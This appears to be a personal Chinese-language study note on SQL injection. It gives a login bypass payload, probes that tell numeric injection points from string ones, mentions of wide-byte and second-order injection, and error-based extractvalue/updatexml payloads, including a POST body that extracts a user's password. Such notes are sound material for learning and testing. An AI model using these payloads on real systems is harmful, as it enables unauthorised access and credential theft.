注入类型

#1.万能注入 'or 1=1 -- '
#select * from users where username=' ' or 1=1 -- 'and password='admin4'

#一·数字型注入判断
#1.?id=1'
#select * from users where id=1';数字型则报错
#2.?id=1 and 1=1
select * from users where id= 1 and 1=1; #正常显示，若为字符型则会无显示(全被当成字符串)
#3. ?id=1 and 1=2
select * from users where id= 1 and 1=2;#不报错也无显示！！！！！

#二。字符型注入点-单引号闭合
use stu;
#1.?Semester=20201'
#select * from stu.sc where Semester='20201''; #报错
#2. ？Semester=20201' and '1'='1
select * from stu.sc where Semester='20201' and '1'='1 '; #正常显示
#3. ?Semester=20201' and '1'='2
select * from stu.sc where Semester='20201' and '1'='2 '; #无报错且无显示即NUll！！！！

#动态字符串构建
#1.宽字节注入 GBK %df \'
#2.二次注入

数字型判断 id=1/0 若报错则为数字型

 

报错例如： select * from test where ide = 1 and (updatexml(1,0x7e,3)); 由于0x7e是~，不属于xpath语法格式，因此报出xpath语法错误。

uname=admin&passwd=1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))--+&submit=Submit

 

(extractvalue (1,concat(0x5c,(select password from users where username='admin1' ),0x5c))

UPDATE users SET password = '1' and (extractvalue (1,concat(0x5c,(select password from users where username='admin1'),0x5c))) --+' WHERE username='$row1'"